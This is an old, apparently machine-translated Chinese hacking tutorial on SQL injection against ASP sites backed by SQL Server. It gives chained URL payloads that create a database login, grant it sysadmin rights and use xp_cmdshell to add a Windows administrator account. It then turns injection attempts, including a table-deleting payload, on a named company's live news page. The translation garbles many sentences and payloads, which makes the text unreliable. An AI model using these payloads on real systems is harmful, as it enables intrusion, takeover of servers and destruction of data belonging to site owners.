About the database the simple intrusion and rogue damage-vulnerability warning-the black bar safety net

ID MYHACK58:62200613481
Type myhack58
Reporter 佚名
Modified 2006-12-29T00:00:00


For domestic and foreign a lot of news, BBS and e-Commerce site using ASP+SQL design, and write an ASP programmer many many have just graduated, so, ASP+SQL attack success rate is relatively high. This type of attack method with the NT version and SQL version is not much relationship, there is no corresponding patch, since the vulnerability is programmer self-inflicted, but most of the tutorials ASP programming books, source code examples will have this vulnerability exists, its just some legal ASP of SQL requests, just leave a ruin! This attack method originated from'or'1'='1 the vulnerability, let's call it vulnerability, this vulnerability of the principle I think we due to the are know, then the consequent is;exec sp_addlogin hax in the database add a hax user, but this method of restriction is large, the first ASP to use a SQL Server account is an administrator, and secondly to request the submitted variables in the entire SQL statement of the last, because there are some programmers use SELECT * FROM news WHERE id=... & topic=... AND..... This method requests the database, then if you use the above examples would be news. asp? id=2;exec sp_addlogin hax Becomes SELECT * FROM news WHERE id=2;exec sp_addlogin hax AND topic=... AND ... The entire SQL statement in the Execute sp_addlogin stored procedure after have AND with the determination of the presence, grammatical errors, your sp_addlogin naturally also can not normal operation, so try the following this method news. asp? id=2;exec sp_addlogin hax;-- Behind-the symbol of the sp_addlogin after the judge sentences into a comment, so you won't have syntax errors, sp_addlogin normal perform! Then we link together to use it. news. asp? id=2;exec master. dbo. sp_addlogin hax;-- news. asp? id=2;exec master. dbo. sp_password null,hax,hax;-- news. asp? id=2;exec master. dbo. sp_addsrvrolemember sysadmin hax;-- news. asp? id=2;exec master. dbo. xp_cmdshell 'net user hax hax /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';-- news. asp? id=2;exec master. dbo. xp_cmdshell 'net localgroup administrators hax /add';-- So, you in his database and the system have left a hax administrator account. Of course, the prerequisite is ASP with an administrator account, so the virtual space we don't try, not the existence of this vulnerability. Later we will discuss, if the other ASP is not with the SQL administrator account, how do we invade, of course, also be related to the 1 4 3 3-port invasion Of course everyone can try it at id=2 a'symbol, mainly to see the other side of the ASP how to write a

Say that when the ASP app using a SQL account instead of the Administrator's time how we do. You as days financial letter homepage, with news content, as follows: http://www.talentit.com.cn/news/news-2.asp?newid=117 Everyone can try it. http://www. talentit. com. cn/news/news-2. asp? newid=1 1 7;select 1 2 3;-- Oh, the message syntax error, select 1 2 3 error, it is obvious, the day the financial New of the ASP in the newid variable back with'no end Then try http://www. talentit. com. cn/news/news-2. asp? newid=1 1 7';delete news;-- Haha, I think as long as the table name guessed it, news library will be deleted